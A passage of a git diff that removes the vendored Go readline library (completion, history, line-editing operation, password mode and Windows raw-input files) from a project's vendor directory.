o.nextCandidate(1) - o.CompleteRefresh() -} - -func (o *opCompleter) nextCandidate(i int) { - o.candidateChoise += i - o.candidateChoise = o.candidateChoise % len(o.candidate) - if o.candidateChoise < 0 { - o.candidateChoise = len(o.candidate) + o.candidateChoise - } -} - -func (o *opCompleter) OnComplete() bool { - if o.width == 0 { - return false - } - if o.IsInCompleteSelectMode() { - o.doSelect() - return true - } - - buf := o.op.buf - rs := buf.Runes() - - if o.IsInCompleteMode() && o.candidateSource != nil && runes.Equal(rs, o.candidateSource) { - o.EnterCompleteSelectMode() - o.doSelect() - return true - } - - o.ExitCompleteSelectMode() - o.candidateSource = rs - newLines, offset := o.op.cfg.AutoComplete.Do(rs, buf.idx) - if len(newLines) == 0 { - o.ExitCompleteMode(false) - return true - } - - // only Aggregate candidates in non-complete mode - if !o.IsInCompleteMode() { - if len(newLines) == 1 { - buf.WriteRunes(newLines[0]) - o.ExitCompleteMode(false) - return true - } - - same, size := runes.Aggregate(newLines) - if size > 0 { - buf.WriteRunes(same) - o.ExitCompleteMode(false) - return true - } - } - - o.EnterCompleteMode(offset, newLines) - return true -} - -func (o *opCompleter) IsInCompleteSelectMode() bool { - return o.inSelectMode -} - -func (o *opCompleter) IsInCompleteMode() bool { - return o.inCompleteMode -} - -func (o *opCompleter) HandleCompleteSelect(r rune) bool { - next := true - switch r { - case CharEnter, CharCtrlJ: - next = false - o.op.buf.WriteRunes(o.op.candidate[o.op.candidateChoise]) - o.ExitCompleteMode(false) - case CharLineStart: - num := o.candidateChoise % o.candidateColNum - o.nextCandidate(-num) - case CharLineEnd: - num := o.candidateColNum - o.candidateChoise%o.candidateColNum - 1 - o.candidateChoise += num - if o.candidateChoise >= len(o.candidate) { - o.candidateChoise = len(o.candidate) - 1 - } - case CharBackspace: - o.ExitCompleteSelectMode() - next = false - case CharTab, CharForward: - o.doSelect() - case CharBell, CharInterrupt: - o.ExitCompleteMode(true) - next = false - case CharNext: - tmpChoise := o.candidateChoise + o.candidateColNum - if tmpChoise >= o.getMatrixSize() { - tmpChoise -= o.getMatrixSize() - } else if tmpChoise >= len(o.candidate) { - tmpChoise += o.candidateColNum - tmpChoise -= o.getMatrixSize() - } - o.candidateChoise = tmpChoise - case CharBackward: - o.nextCandidate(-1) - case CharPrev: - tmpChoise := o.candidateChoise - o.candidateColNum - if tmpChoise < 0 { - tmpChoise += o.getMatrixSize() - if tmpChoise >= len(o.candidate) { - tmpChoise -= o.candidateColNum - } - } - o.candidateChoise = tmpChoise - default: - next = false - o.ExitCompleteSelectMode() - } - if next { - o.CompleteRefresh() - return true - } - return false -} - -func (o *opCompleter) getMatrixSize() int { - line := len(o.candidate) / o.candidateColNum - if len(o.candidate)%o.candidateColNum != 0 { - line++ - } - return line * o.candidateColNum -} - -func (o *opCompleter) OnWidthChange(newWidth int) { - o.width = newWidth -} - -func (o *opCompleter) CompleteRefresh() { - if !o.inCompleteMode { - return - } - lineCnt := o.op.buf.CursorLineCount() - colWidth := 0 - for _, c := range o.candidate { - w := runes.WidthAll(c) - if w > colWidth { - colWidth = w - } - } - colWidth += o.candidateOff + 1 - same := o.op.buf.RuneSlice(-o.candidateOff) - - // -1 to avoid reach the end of line - width := o.width - 1 - colNum := width / colWidth - colWidth += (width - (colWidth * colNum)) / colNum - - o.candidateColNum = colNum - buf := bufio.NewWriter(o.w) - buf.Write(bytes.Repeat([]byte("\n"), lineCnt)) - - colIdx := 0 - lines := 1 - buf.WriteString("\033[J") - for idx, c := range o.candidate { - inSelect := idx == o.candidateChoise && o.IsInCompleteSelectMode() - if inSelect { - buf.WriteString("\033[30;47m") - } - buf.WriteString(string(same)) - buf.WriteString(string(c)) - buf.Write(bytes.Repeat([]byte(" "), colWidth-len(c)-len(same))) - - if inSelect { - buf.WriteString("\033[0m") - } - - colIdx++ - if colIdx == colNum { - buf.WriteString("\n") - lines++ - colIdx = 0 - } - } - - // move back - fmt.Fprintf(buf, "\033[%dA\r", lineCnt-1+lines) - fmt.Fprintf(buf, "\033[%dC", o.op.buf.idx+o.op.buf.PromptLen()) - buf.Flush() -} - -func (o *opCompleter) aggCandidate(candidate [][]rune) int { - offset := 0 - for i := 0; i < len(candidate[0]); i++ { - for j := 0; j < len(candidate)-1; j++ { - if i > len(candidate[j]) { - goto aggregate - } - if candidate[j][i] != candidate[j+1][i] { - goto aggregate - } - } - offset = i - } -aggregate: - return offset -} - -func (o *opCompleter) EnterCompleteSelectMode() { - o.inSelectMode = true - o.candidateChoise = -1 - o.CompleteRefresh() -} - -func (o *opCompleter) EnterCompleteMode(offset int, candidate [][]rune) { - o.inCompleteMode = true - o.candidate = candidate - o.candidateOff = offset - o.CompleteRefresh() -} - -func (o *opCompleter) ExitCompleteSelectMode() { - o.inSelectMode = false - o.candidate = nil - o.candidateChoise = -1 - o.candidateOff = -1 - o.candidateSource = nil -} - -func (o *opCompleter) ExitCompleteMode(revent bool) { - o.inCompleteMode = false - o.ExitCompleteSelectMode() -} diff --git a/vendor/github.com/chzyer/readline/complete_helper.go b/vendor/github.com/chzyer/readline/complete_helper.go deleted file mode 100644 index 58d72487..00000000 --- a/vendor/github.com/chzyer/readline/complete_helper.go +++ /dev/null @@ -1,165 +0,0 @@ -package readline - -import ( - "bytes" - "strings" -) - -// Caller type for dynamic completion -type DynamicCompleteFunc func(string) []string - -type PrefixCompleterInterface interface { - Print(prefix string, level int, buf *bytes.Buffer) - Do(line []rune, pos int) (newLine [][]rune, length int) - GetName() []rune - GetChildren() []PrefixCompleterInterface - SetChildren(children []PrefixCompleterInterface) -} - -type DynamicPrefixCompleterInterface interface { - PrefixCompleterInterface - IsDynamic() bool - GetDynamicNames(line []rune) [][]rune -} - -type PrefixCompleter struct { - Name []rune - Dynamic bool - Callback DynamicCompleteFunc - Children []PrefixCompleterInterface -} - -func (p *PrefixCompleter) Tree(prefix string) string { - buf := bytes.NewBuffer(nil) - p.Print(prefix, 0, buf) - return buf.String() -} - -func Print(p PrefixCompleterInterface, prefix string, level int, buf *bytes.Buffer) { - if strings.TrimSpace(string(p.GetName())) != "" { - buf.WriteString(prefix) - if level > 0 { - buf.WriteString("├") - buf.WriteString(strings.Repeat("─", (level*4)-2)) - buf.WriteString(" ") - } - buf.WriteString(string(p.GetName()) + "\n") - level++ - } - for _, ch := range p.GetChildren() { - ch.Print(prefix, level, buf) - } -} - -func (p *PrefixCompleter) Print(prefix string, level int, buf *bytes.Buffer) { - Print(p, prefix, level, buf) -} - -func (p *PrefixCompleter) IsDynamic() bool { - return p.Dynamic -} - -func (p *PrefixCompleter) GetName() []rune { - return p.Name -} - -func (p *PrefixCompleter) GetDynamicNames(line []rune) [][]rune { - var names = [][]rune{} - for _, name := range p.Callback(string(line)) { - names = append(names, []rune(name+" ")) - } - return names -} - -func (p *PrefixCompleter) GetChildren() []PrefixCompleterInterface { - return p.Children -} - -func (p *PrefixCompleter) SetChildren(children []PrefixCompleterInterface) { - p.Children = children -} - -func NewPrefixCompleter(pc ...PrefixCompleterInterface) *PrefixCompleter { - return PcItem("", pc...) -} - -func PcItem(name string, pc ...PrefixCompleterInterface) *PrefixCompleter { - name += " " - return &PrefixCompleter{ - Name: []rune(name), - Dynamic: false, - Children: pc, - } -} - -func PcItemDynamic(callback DynamicCompleteFunc, pc ...PrefixCompleterInterface) *PrefixCompleter { - return &PrefixCompleter{ - Callback: callback, - Dynamic: true, - Children: pc, - } -} - -func (p *PrefixCompleter) Do(line []rune, pos int) (newLine [][]rune, offset int) { - return doInternal(p, line, pos, line) -} - -func Do(p PrefixCompleterInterface, line []rune, pos int) (newLine [][]rune, offset int) { - return doInternal(p, line, pos, line) -} - -func doInternal(p PrefixCompleterInterface, line []rune, pos int, origLine []rune) (newLine [][]rune, offset int) { - line = runes.TrimSpaceLeft(line[:pos]) - goNext := false - var lineCompleter PrefixCompleterInterface - for _, child := range p.GetChildren() { - childNames := make([][]rune, 1) - - childDynamic, ok := child.(DynamicPrefixCompleterInterface) - if ok && childDynamic.IsDynamic() { - childNames = childDynamic.GetDynamicNames(origLine) - } else { - childNames[0] = child.GetName() - } - - for _, childName := range childNames { - if len(line) >= len(childName) { - if runes.HasPrefix(line, childName) { - if len(line) == len(childName) { - newLine = append(newLine, []rune{' '}) - } else { - newLine = append(newLine, childName) - } - offset = len(childName) - lineCompleter = child - goNext = true - } - } else { - if runes.HasPrefix(childName, line) { - newLine = append(newLine, childName[len(line):]) - offset = len(line) - lineCompleter = child - } - } - } - } - - if len(newLine) != 1 { - return - } - - tmpLine := make([]rune, 0, len(line)) - for i := offset; i < len(line); i++ { - if line[i] == ' ' { - continue - } - - tmpLine = append(tmpLine, line[i:]...) - return doInternal(lineCompleter, tmpLine, len(tmpLine), origLine) - } - - if goNext { - return doInternal(lineCompleter, nil, 0, origLine) - } - return -} diff --git a/vendor/github.com/chzyer/readline/complete_segment.go b/vendor/github.com/chzyer/readline/complete_segment.go deleted file mode 100644 index 5ceadd80..00000000 --- a/vendor/github.com/chzyer/readline/complete_segment.go +++ /dev/null @@ -1,82 +0,0 @@ -package readline - -type SegmentCompleter interface { - // a - // |- a1 - // |--- a11 - // |- a2 - // b - // input: - // DoTree([], 0) [a, b] - // DoTree([a], 1) [a] - // DoTree([a, ], 0) [a1, a2] - // DoTree([a, a], 1) [a1, a2] - // DoTree([a, a1], 2) [a1] - // DoTree([a, a1, ], 0) [a11] - // DoTree([a, a1, a], 1) [a11] - DoSegment([][]rune, int) [][]rune -} - -type dumpSegmentCompleter struct { - f func([][]rune, int) [][]rune -} - -func (d *dumpSegmentCompleter) DoSegment(segment [][]rune, n int) [][]rune { - return d.f(segment, n) -} - -func SegmentFunc(f func([][]rune, int) [][]rune) AutoCompleter { - return &SegmentComplete{&dumpSegmentCompleter{f}} -} - -func SegmentAutoComplete(completer SegmentCompleter) *SegmentComplete { - return &SegmentComplete{ - SegmentCompleter: completer, - } -} - -type SegmentComplete struct { - SegmentCompleter -} - -func RetSegment(segments [][]rune, cands [][]rune, idx int) ([][]rune, int) { - ret := make([][]rune, 0, len(cands)) - lastSegment := segments[len(segments)-1] - for _, cand := range cands { - if !runes.HasPrefix(cand, lastSegment) { - continue - } - ret = append(ret, cand[len(lastSegment):]) - } - return ret, idx -} - -func SplitSegment(line []rune, pos int) ([][]rune, int) { - segs := [][]rune{} - lastIdx := -1 - line = line[:pos] - pos = 0 - for idx, l := range line { - if l == ' ' { - pos = 0 - segs = append(segs, line[lastIdx+1:idx]) - lastIdx = idx - } else { - pos++ - } - } - segs = append(segs, line[lastIdx+1:]) - return segs, pos -} - -func (c *SegmentComplete) Do(line []rune, pos int) (newLine [][]rune, offset int) { - - segment, idx := SplitSegment(line, pos) - - cands := c.DoSegment(segment, idx) - newLine, offset = RetSegment(segment, cands, idx) - for idx := range newLine { - newLine[idx] = append(newLine[idx], ' ') - } - return newLine, offset -} diff --git a/vendor/github.com/chzyer/readline/history.go b/vendor/github.com/chzyer/readline/history.go deleted file mode 100644 index b154aedd..00000000 --- a/vendor/github.com/chzyer/readline/history.go +++ /dev/null @@ -1,312 +0,0 @@ -package readline - -import ( - "bufio" - "container/list" - "fmt" - "os" - "strings" - "sync" -) - -type hisItem struct { - Source []rune - Version int64 - Tmp []rune -} - -func (h *hisItem) Clean() { - h.Source = nil - h.Tmp = nil -} - -type opHistory struct { - cfg *Config - history *list.List - historyVer int64 - current *list.Element - fd *os.File - fdLock sync.Mutex -} - -func newOpHistory(cfg *Config) (o *opHistory) { - o = &opHistory{ - cfg: cfg, - history: list.New(), - } - return o -} - -func (o *opHistory) Reset() { - o.history = list.New() - o.current = nil -} - -func (o *opHistory) IsHistoryClosed() bool { - o.fdLock.Lock() - defer o.fdLock.Unlock() - return o.fd.Fd() == ^(uintptr(0)) -} - -func (o *opHistory) Init() { - if o.IsHistoryClosed() { - o.initHistory() - } -} - -func (o *opHistory) initHistory() { - if o.cfg.HistoryFile != "" { - o.historyUpdatePath(o.cfg.HistoryFile) - } -} - -// only called by newOpHistory -func (o *opHistory) historyUpdatePath(path string) { - o.fdLock.Lock() - defer o.fdLock.Unlock() - f, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_RDWR, 0666) - if err != nil { - return - } - o.fd = f - r := bufio.NewReader(o.fd) - total := 0 - for ; ; total++ { - line, err := r.ReadString('\n') - if err != nil { - break - } - // ignore the empty line - line = strings.TrimSpace(line) - if len(line) == 0 { - continue - } - o.Push([]rune(line)) - o.Compact() - } - if total > o.cfg.HistoryLimit { - o.rewriteLocked() - } - o.historyVer++ - o.Push(nil) - return -} - -func (o *opHistory) Compact() { - for o.history.Len() > o.cfg.HistoryLimit && o.history.Len() > 0 { - o.history.Remove(o.history.Front()) - } -} - -func (o *opHistory) Rewrite() { - o.fdLock.Lock() - defer o.fdLock.Unlock() - o.rewriteLocked() -} - -func (o *opHistory) rewriteLocked() { - if o.cfg.HistoryFile == "" { - return - } - - tmpFile := o.cfg.HistoryFile + ".tmp" - fd, err := os.OpenFile(tmpFile, os.O_CREATE|os.O_WRONLY|os.O_TRUNC|os.O_APPEND, 0666) - if err != nil { - return - } - - buf := bufio.NewWriter(fd) - for elem := o.history.Front(); elem != nil; elem = elem.Next() { - buf.WriteString(string(elem.Value.(*hisItem).Source)) - } - buf.Flush() - - // replace history file - if err = os.Rename(tmpFile, o.cfg.HistoryFile); err != nil { - fd.Close() - return - } - - if o.fd != nil { - o.fd.Close() - } - // fd is write only, just satisfy what we need. - o.fd = fd -} - -func (o *opHistory) Close() { - o.fdLock.Lock() - defer o.fdLock.Unlock() - if o.fd != nil { - o.fd.Close() - } -} - -func (o *opHistory) FindBck(isNewSearch bool, rs []rune, start int) (int, *list.Element) { - for elem := o.current; elem != nil; elem = elem.Prev() { - item := o.showItem(elem.Value) - if isNewSearch { - start += len(rs) - } - if elem == o.current { - if len(item) >= start { - item = item[:start] - } - } - idx := runes.IndexAllBckEx(item, rs, o.cfg.HistorySearchFold) - if idx < 0 { - continue - } - return idx, elem - } - return -1, nil -} - -func (o *opHistory) FindFwd(isNewSearch bool, rs []rune, start int) (int, *list.Element) { - for elem := o.current; elem != nil; elem = elem.Next() { - item := o.showItem(elem.Value) - if isNewSearch { - start -= len(rs) - if start < 0 { - start = 0 - } - } - if elem == o.current { - if len(item)-1 >= start { - item = item[start:] - } else { - continue - } - } - idx := runes.IndexAllEx(item, rs, o.cfg.HistorySearchFold) - if idx < 0 { - continue - } - if elem == o.current { - idx += start - } - return idx, elem - } - return -1, nil -} - -func (o *opHistory) showItem(obj interface{}) []rune { - item := obj.(*hisItem) - if item.Version == o.historyVer { - return item.Tmp - } - return item.Source -} - -func (o *opHistory) Prev() []rune { - if o.current == nil { - return nil - } - current := o.current.Prev() - if current == nil { - return nil - } - o.current = current - return runes.Copy(o.showItem(current.Value)) -} - -func (o *opHistory) Next() ([]rune, bool) { - if o.current == nil { - return nil, false - } - current := o.current.Next() - if current == nil { - return nil, false - } - - o.current = current - return runes.Copy(o.showItem(current.Value)), true -} - -func (o *opHistory) debug() { - Debug("-------") - for item := o.history.Front(); item != nil; item = item.Next() { - Debug(fmt.Sprintf("%+v", item.Value)) - } -} - -// save history -func (o *opHistory) New(current []rune) (err error) { - current = runes.Copy(current) - - // if just use last command without modify - // just clean lastest history - if back := o.history.Back(); back != nil { - prev := back.Prev() - if prev != nil { - if runes.Equal(current, prev.Value.(*hisItem).Source) { - o.current = o.history.Back() - o.current.Value.(*hisItem).Clean() - o.historyVer++ - return nil - } - } - } - - if len(current) == 0 { - o.current = o.history.Back() - if o.current != nil { - o.current.Value.(*hisItem).Clean() - o.historyVer++ - return nil - } - } - - if o.current != o.history.Back() { - // move history item to current command - currentItem := o.current.Value.(*hisItem) - // set current to last item - o.current = o.history.Back() - - current = runes.Copy(currentItem.Tmp) - } - - // err only can be a IO error, just report - err = o.Update(current, true) - - // push a new one to commit current command - o.historyVer++ - o.Push(nil) - return -} - -func (o *opHistory) Revert() { - o.historyVer++ - o.current = o.history.Back() -} - -func (o *opHistory) Update(s []rune, commit bool) (err error) { - o.fdLock.Lock() - defer o.fdLock.Unlock() - s = runes.Copy(s) - if o.current == nil { - o.Push(s) - o.Compact() - return - } - r := o.current.Value.(*hisItem) - r.Version = o.historyVer - if commit { - r.Source = s - if o.fd != nil { - // just report the error - _, err = o.fd.Write([]byte(string(r.Source) + "\n")) - } - } else { - r.Tmp = append(r.Tmp[:0], s...) - } - o.current.Value = r - o.Compact() - return -} - -func (o *opHistory) Push(s []rune) { - s = runes.Copy(s) - elem := o.history.PushBack(&hisItem{Source: s}) - o.current = elem -} diff --git a/vendor/github.com/chzyer/readline/operation.go b/vendor/github.com/chzyer/readline/operation.go deleted file mode 100644 index 2c93561d..00000000 --- a/vendor/github.com/chzyer/readline/operation.go +++ /dev/null @@ -1,504 +0,0 @@ -package readline - -import ( - "errors" - "io" -) - -var ( - ErrInterrupt = errors.New("Interrupt") -) - -type InterruptError struct { - Line []rune -} - -func (*InterruptError) Error() string { - return "Interrupted" -} - -type Operation struct { - cfg *Config - t *Terminal - buf *RuneBuffer - outchan chan []rune - errchan chan error - w io.Writer - - history *opHistory - *opSearch - *opCompleter - *opPassword - *opVim -} - -func (o *Operation) SetBuffer(what string) { - o.buf.Set([]rune(what)) -} - -type wrapWriter struct { - r *Operation - t *Terminal - target io.Writer -} - -func (w *wrapWriter) Write(b []byte) (int, error) { - if !w.t.IsReading() { - return w.target.Write(b) - } - - var ( - n int - err error - ) - w.r.buf.Refresh(func() { - n, err = w.target.Write(b) - }) - - if w.r.IsSearchMode() { - w.r.SearchRefresh(-1) - } - if w.r.IsInCompleteMode() { - w.r.CompleteRefresh() - } - return n, err -} - -func NewOperation(t *Terminal, cfg *Config) *Operation { - width := cfg.FuncGetWidth() - op := &Operation{ - t: t, - buf: NewRuneBuffer(t, cfg.Prompt, cfg, width), - outchan: make(chan []rune), - errchan: make(chan error), - } - op.w = op.buf.w - op.SetConfig(cfg) - op.opVim = newVimMode(op) - op.opCompleter = newOpCompleter(op.buf.w, op, width) - op.opPassword = newOpPassword(op) - op.cfg.FuncOnWidthChanged(func() { - newWidth := cfg.FuncGetWidth() - op.opCompleter.OnWidthChange(newWidth) - op.opSearch.OnWidthChange(newWidth) - op.buf.OnWidthChange(newWidth) - }) - go op.ioloop() - return op -} - -func (o *Operation) SetPrompt(s string) { - o.buf.SetPrompt(s) -} - -func (o *Operation) SetMaskRune(r rune) { - o.buf.SetMask(r) -} - -func (o *Operation) ioloop() { - for { - keepInSearchMode := false - keepInCompleteMode := false - r := o.t.ReadRune() - if o.cfg.FuncFilterInputRune != nil { - var process bool - r, process = o.cfg.FuncFilterInputRune(r) - if !process { - o.buf.Refresh(nil) // to refresh the line - continue // ignore this rune - } - } - - if r == 0 { // io.EOF - if o.buf.Len() == 0 { - o.buf.Clean() - select { - case o.errchan <- io.EOF: - } - break - } else { - // if stdin got io.EOF and there is something left in buffer, - // let's flush them by sending CharEnter. - // And we will got io.EOF int next loop. - r = CharEnter - } - } - isUpdateHistory := true - - if o.IsInCompleteSelectMode() { - keepInCompleteMode = o.HandleCompleteSelect(r) - if keepInCompleteMode { - continue - } - - o.buf.Refresh(nil) - switch r { - case CharEnter, CharCtrlJ: - o.history.Update(o.buf.Runes(), false) - fallthrough - case CharInterrupt: - o.t.KickRead() - fallthrough - case CharBell: - continue - } - } - - if o.IsEnableVimMode() { - r = o.HandleVim(r, o.t.ReadRune) - if r == 0 { - continue - } - } - - switch r { - case CharBell: - if o.IsSearchMode() { - o.ExitSearchMode(true) - o.buf.Refresh(nil) - } - if o.IsInCompleteMode() { - o.ExitCompleteMode(true) - o.buf.Refresh(nil) - } - case CharTab: - if o.cfg.AutoComplete == nil { - o.t.Bell() - break - } - if o.OnComplete() { - keepInCompleteMode = true - } else { - o.t.Bell() - break - } - - case CharBckSearch: - if !o.SearchMode(S_DIR_BCK) { - o.t.Bell() - break - } - keepInSearchMode = true - case CharCtrlU: - o.buf.KillFront() - case CharFwdSearch: - if !o.SearchMode(S_DIR_FWD) { - o.t.Bell() - break - } - keepInSearchMode = true - case CharKill: - o.buf.Kill() - keepInCompleteMode = true - case MetaForward: - o.buf.MoveToNextWord() - case CharTranspose: - o.buf.Transpose() - case MetaBackward: - o.buf.MoveToPrevWord() - case MetaDelete: - o.buf.DeleteWord() - case CharLineStart: - o.buf.MoveToLineStart() - case CharLineEnd: - o.buf.MoveToLineEnd() - case CharBackspace, CharCtrlH: - if o.IsSearchMode() { - o.SearchBackspace() - keepInSearchMode = true - break - } - - if o.buf.Len() == 0 { - o.t.Bell() - break - } - o.buf.Backspace() - if o.IsInCompleteMode() { - o.OnComplete() - } - case CharCtrlZ: - o.buf.Clean() - o.t.SleepToResume() - o.Refresh() - case CharCtrlL: - ClearScreen(o.w) - o.Refresh() - case MetaBackspace, CharCtrlW: - o.buf.BackEscapeWord() - case CharEnter, CharCtrlJ: - if o.IsSearchMode() { - o.ExitSearchMode(false) - } - o.buf.MoveToLineEnd() - var data []rune - if !o.cfg.UniqueEditLine { - o.buf.WriteRune('\n') - data = o.buf.Reset() - data = data[:len(data)-1] // trim \n - } else { - o.buf.Clean() - data = o.buf.Reset() - } - o.outchan <- data - if !o.cfg.DisableAutoSaveHistory { - // ignore IO error - _ = o.history.New(data) - } else { - isUpdateHistory = false - } - case CharBackward: - o.buf.MoveBackward() - case CharForward: - o.buf.MoveForward() - case CharPrev: - buf := o.history.Prev() - if buf != nil { - o.buf.Set(buf) - } else { - o.t.Bell() - } - case CharNext: - buf, ok := o.history.Next() - if ok { - o.buf.Set(buf) - } else { - o.t.Bell() - } - case CharDelete: - if o.buf.Len() > 0 || !o.IsNormalMode() { - o.t.KickRead() - if !o.buf.Delete() { - o.t.Bell() - } - break - } - - // treat as EOF - if !o.cfg.UniqueEditLine { - o.buf.WriteString(o.cfg.EOFPrompt + "\n") - } - o.buf.Reset() - isUpdateHistory = false - o.history.Revert() - o.errchan <- io.EOF - if o.cfg.UniqueEditLine { - o.buf.Clean() - } - case CharInterrupt: - if o.IsSearchMode() { - o.t.KickRead() - o.ExitSearchMode(true) - break - } - if o.IsInCompleteMode() { - o.t.KickRead() - o.ExitCompleteMode(true) - o.buf.Refresh(nil) - break - } - o.buf.MoveToLineEnd() - o.buf.Refresh(nil) - hint := o.cfg.InterruptPrompt + "\n" - if !o.cfg.UniqueEditLine { - o.buf.WriteString(hint) - } - remain := o.buf.Reset() - if !o.cfg.UniqueEditLine { - remain = remain[:len(remain)-len([]rune(hint))] - } - isUpdateHistory = false - o.history.Revert() - o.errchan <- &InterruptError{remain} - default: - if o.IsSearchMode() { - o.SearchChar(r) - keepInSearchMode = true - break - } - o.buf.WriteRune(r) - if o.IsInCompleteMode() { - o.OnComplete() - keepInCompleteMode = true - } - } - - if o.cfg.Listener != nil { - newLine, newPos, ok := o.cfg.Listener.OnChange(o.buf.Runes(), o.buf.Pos(), r) - if ok { - o.buf.SetWithIdx(newPos, newLine) - } - } - - if !keepInSearchMode && o.IsSearchMode() { - o.ExitSearchMode(false) - o.buf.Refresh(nil) - } else if o.IsInCompleteMode() { - if !keepInCompleteMode { - o.ExitCompleteMode(false) - o.Refresh() - } else { - o.buf.Refresh(nil) - o.CompleteRefresh() - } - } - if isUpdateHistory && !o.IsSearchMode() { - // it will cause null history - o.history.Update(o.buf.Runes(), false) - } - } -} - -func (o *Operation) Stderr() io.Writer { - return &wrapWriter{target: o.cfg.Stderr, r: o, t: o.t} -} - -func (o *Operation) Stdout() io.Writer { - return &wrapWriter{target: o.cfg.Stdout, r: o, t: o.t} -} - -func (o *Operation) String() (string, error) { - r, err := o.Runes() - return string(r), err -} - -func (o *Operation) Runes() ([]rune, error) { - o.t.EnterRawMode() - defer o.t.ExitRawMode() - - if o.cfg.Listener != nil { - o.cfg.Listener.OnChange(nil, 0, 0) - } - - o.buf.Refresh(nil) // print prompt - o.t.KickRead() - select { - case r := <-o.outchan: - return r, nil - case err := <-o.errchan: - if e, ok := err.(*InterruptError); ok { - return e.Line, ErrInterrupt - } - return nil, err - } -} - -func (o *Operation) PasswordEx(prompt string, l Listener) ([]byte, error) { - cfg := o.GenPasswordConfig() - cfg.Prompt = prompt - cfg.Listener = l - return o.PasswordWithConfig(cfg) -} - -func (o *Operation) GenPasswordConfig() *Config { - return o.opPassword.PasswordConfig() -} - -func (o *Operation) PasswordWithConfig(cfg *Config) ([]byte, error) { - if err := o.opPassword.EnterPasswordMode(cfg); err != nil { - return nil, err - } - defer o.opPassword.ExitPasswordMode() - return o.Slice() -} - -func (o *Operation) Password(prompt string) ([]byte, error) { - return o.PasswordEx(prompt, nil) -} - -func (o *Operation) SetTitle(t string) { - o.w.Write([]byte("\033[2;" + t + "\007")) -} - -func (o *Operation) Slice() ([]byte, error) { - r, err := o.Runes() - if err != nil { - return nil, err - } - return []byte(string(r)), nil -} - -func (o *Operation) Close() { - o.history.Close() -} - -func (o *Operation) SetHistoryPath(path string) { - if o.history != nil { - o.history.Close() - } - o.cfg.HistoryFile = path - o.history = newOpHistory(o.cfg) -} - -func (o *Operation) IsNormalMode() bool { - return !o.IsInCompleteMode() && !o.IsSearchMode() -} - -func (op *Operation) SetConfig(cfg *Config) (*Config, error) { - if op.cfg == cfg { - return op.cfg, nil - } - if err := cfg.Init(); err != nil { - return op.cfg, err - } - old := op.cfg - op.cfg = cfg - op.SetPrompt(cfg.Prompt) - op.SetMaskRune(cfg.MaskRune) - op.buf.SetConfig(cfg) - width := op.cfg.FuncGetWidth() - - if cfg.opHistory == nil { - op.SetHistoryPath(cfg.HistoryFile) - cfg.opHistory = op.history - cfg.opSearch = newOpSearch(op.buf.w, op.buf, op.history, cfg, width) - } - op.history = cfg.opHistory - - // SetHistoryPath will close opHistory which already exists - // so if we use it next time, we need to reopen it by `InitHistory()` - op.history.Init() - - if op.cfg.AutoComplete != nil { - op.opCompleter = newOpCompleter(op.buf.w, op, width) - } - - op.opSearch = cfg.opSearch - return old, nil -} - -func (o *Operation) ResetHistory() { - o.history.Reset() -} - -// if err is not nil, it just mean it fail to write to file -// other things goes fine. -func (o *Operation) SaveHistory(content string) error { - return o.history.New([]rune(content)) -} - -func (o *Operation) Refresh() { - if o.t.IsReading() { - o.buf.Refresh(nil) - } -} - -func (o *Operation) Clean() { - o.buf.Clean() -} - -func FuncListener(f func(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool)) Listener { - return &DumpListener{f: f} -} - -type DumpListener struct { - f func(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool) -} - -func (d *DumpListener) OnChange(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool) { - return d.f(line, pos, key) -} - -type Listener interface { - OnChange(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool) -} diff --git a/vendor/github.com/chzyer/readline/password.go b/vendor/github.com/chzyer/readline/password.go deleted file mode 100644 index 4b073795..00000000 --- a/vendor/github.com/chzyer/readline/password.go +++ /dev/null @@ -1,32 +0,0 @@ -package readline - -type opPassword struct { - o *Operation - backupCfg *Config -} - -func newOpPassword(o *Operation) *opPassword { - return &opPassword{o: o} -} - -func (o *opPassword) ExitPasswordMode() { - o.o.SetConfig(o.backupCfg) - o.backupCfg = nil -} - -func (o *opPassword) EnterPasswordMode(cfg *Config) (err error) { - o.backupCfg, err = o.o.SetConfig(cfg) - return -} - -func (o *opPassword) PasswordConfig() *Config { - return &Config{ - EnableMask: true, - InterruptPrompt: "\n", - EOFPrompt: "\n", - HistoryLimit: -1, - - Stdout: o.o.cfg.Stdout, - Stderr: o.o.cfg.Stderr, - } -} diff --git a/vendor/github.com/chzyer/readline/rawreader_windows.go b/vendor/github.com/chzyer/readline/rawreader_windows.go deleted file mode 100644 index 073ef150..00000000 --- a/vendor/github.com/chzyer/readline/rawreader_windows.go +++ /dev/null @@ -1,125 +0,0 @@ -// +build windows - -package readline - -import "unsafe" - -const ( - VK_CANCEL = 0x03 - VK_BACK = 0x08 - VK_TAB = 0x09 - VK_RETURN = 0x0D - VK_SHIFT = 0x10 - VK_CONTROL = 0x11 - VK_MENU = 0x12 - VK_ESCAPE = 0x1B - VK_LEFT = 0x25 - VK_UP = 0x26 - VK_RIGHT = 0x27 - VK_DOWN = 0x28 - VK_DELETE = 0x2E - VK_LSHIFT = 0xA0 - VK_RSHIFT = 0xA1 - VK_LCONTROL = 0xA2 - VK_RCONTROL = 0xA3 -) - -// RawReader translate input record to ANSI escape sequence. -// To provides same behavior as unix terminal. -type RawReader struct { - ctrlKey bool - altKey bool -} - -func NewRawReader() *RawReader { - r := new(RawReader) - return r -} - -// only process one action in one read -func (r *RawReader) Read(buf []byte) (int, error) { - ir := new(_INPUT_RECORD) - var read int - var err error -next: - err = kernel.ReadConsoleInputW(stdin, - uintptr(unsafe.Pointer(ir)), - 1, - uintptr(unsafe.Pointer(&read)), - ) - if err != nil { - return 0, err - } - if ir.EventType != EVENT_KEY { - goto next - } - ker := (*_KEY_EVENT_RECORD)(unsafe.Pointer(&ir.Event[0])) - if ker.bKeyDown == 0 { // keyup - if r.ctrlKey || r.altKey { - switch ker.wVirtualKeyCode { - case VK_RCONTROL, VK_LCONTROL: - r.ctrlKey = false - case VK_MENU: //alt - r.altKey = false - } - } - goto next - } - - if ker.unicodeChar == 0 { - var target rune - switch ker.wVirtualKeyCode { - case VK_RCONTROL, VK_LCONTROL: - r.ctrlKey = true - case VK_MENU: //alt - r.altKey = true - case VK_LEFT: - target = CharBackward - case VK_RIGHT: - target = CharForward - case VK_UP: - target = CharPrev - case VK_DOWN: - target = CharNext - } - if target != 0 { - return r.write(buf, target) - } - goto next - } - char := rune(ker.unicodeChar) - if r.ctrlKey { - switch char { - case 'A': - char = CharLineStart - case 'E': - char = 